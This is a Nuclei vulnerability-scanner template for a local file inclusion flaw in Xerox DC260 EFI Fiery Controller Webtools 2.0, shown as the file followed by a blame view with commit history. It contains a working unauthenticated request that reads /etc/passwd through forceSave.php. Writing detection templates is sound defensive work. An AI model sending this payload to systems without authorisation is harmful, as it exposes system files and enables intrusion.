nuclei-templates/http/vulnerabilities/other/xerox-efi-lfi.yaml

id: xerox-efi-lfi

info:
  name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Local File Inclusion
  author: gy741
  severity: high
  description: Xerox DC260 EFI Fiery Controller Webtools 2.0 is vulnerable to local file inclusion because input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
    - https://packetstormsecurity.com/files/145570
    - https://www.exploit-db.com/exploits/43398/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: iot,xerox,disclosure,lfi,packetstorm,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100df516cfc896ae17928cb064dce74ddfa3a9dfb9926355ce2bb55e2fd85b50902022001ce6d105bae175ffeaba26a8a9cd7c9689319d982b17031ea2d7914771fa77d:922c64590222798bb761d5b6d8e72950
Create xerox-efi-lfi.yaml Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-09 06:39:39 +00:00			`id: xerox-efi-lfi`

			`info:`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Local File Inclusion`
Create xerox-efi-lfi.yaml Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-09 06:39:39 +00:00			`author: gy741`
			`severity: high`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`description: Xerox DC260 EFI Fiery Controller Webtools 2.0 is vulnerable to local file inclusion because input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.`
Create xerox-efi-lfi.yaml Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-09 06:39:39 +00:00			`reference:`
			`- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php`
Update xerox-efi-lfi.yaml 2022-01-10 06:37:06 +00:00			`- https://packetstormsecurity.com/files/145570`
			`- https://www.exploit-db.com/exploits/43398/`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cwe-id: CWE-22`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`tags: iot,xerox,disclosure,lfi,packetstorm,edb`
Create xerox-efi-lfi.yaml Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-09 06:39:39 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create xerox-efi-lfi.yaml Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-09 06:39:39 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:.*:0:0:"`

			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a00473045022100df516cfc896ae17928cb064dce74ddfa3a9dfb9926355ce2bb55e2fd85b50902022001ce6d105bae175ffeaba26a8a9cd7c9689319d982b17031ea2d7914771fa77d:922c64590222798bb761d5b6d8e72950`